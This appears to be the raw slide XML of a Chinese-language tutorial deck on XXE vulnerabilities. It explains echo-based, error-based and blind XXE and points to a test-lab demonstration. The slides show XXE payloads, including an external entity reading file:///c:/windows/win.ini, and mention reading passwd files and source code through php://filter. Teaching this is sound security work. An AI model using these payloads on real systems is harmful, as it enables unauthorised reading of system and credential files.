                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件的内容，应用程序就会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文件的内容并呈献给用户，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>从而实现了</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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击主要分为三类：正常回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE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正常回显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是最传统的</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在利用过程中服务器会直接回显信息，可直接完成</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:scheme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报错</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攻击的一种特例</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它与正常回显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的不同在于它在利用过程中服务器回显的是错误信息，可根据错误信息的不同判断是否注入成功。</a:t>
            </a:r>
          </a:p>
          <a:p>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当允许引用外部实体时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击通过构造恶意内容，可导致读取任意文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>执行系统命令、探测内网端口、攻击内网网站等危害。我们将在接下来的测试靶场中进一步进行演示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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A43AF24-E1A5-49B7-A527-0F71E9AC1ED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6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.png"/><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649105" y="3528658"/>
            <a:ext cx="6893790" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>漏洞分析与实战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图形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222" y="2204477"/>
            <a:ext cx="1193557" cy="11935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262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 2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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2478505" y="1236385"/>
            <a:ext cx="7248827" cy="5522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3" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230968" y="1776384"/>
            <a:ext cx="8797548" cy="873701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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中可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议读取文件，还可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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伪协议。</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在各语言下支持的协议有以下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2168260" y="1177143"/>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读取任意文件</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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2753180" y="2791294"/>
            <a:ext cx="7276345" cy="3769672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 5"/>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7" name="Group 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898809" y="1028097"/>
              <a:ext cx="362272" cy="73025"/>
              <a:chOff x="7340600" y="4686300"/>
              <a:chExt cx="504030" cy="101600"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="5EE2B1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="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9"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0"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262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 2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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277834" y="2230905"/>
            <a:ext cx="4450485" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE ANY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ABB2BF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>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endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577334" y="1312791"/>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判断有无回显</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277834" y="3743912"/>
            <a:ext cx="4362482" cy="20621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262808" y="337827"/>
            <a:ext cx="3680220" cy="686293"/>
            <a:chOff x="4420971" y="414829"/>
            <a:chExt cx="3680220" cy="686293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 2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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548124" y="2124682"/>
            <a:ext cx="8314429" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///c:/windows/win.ini"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="669900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>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endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577334" y="1312791"/>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读取敏感目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577333" y="3620888"/>
            <a:ext cx="6585995" cy="24430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3" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598907" y="1961360"/>
            <a:ext cx="8797548" cy="458202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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源代码一般用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php://filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
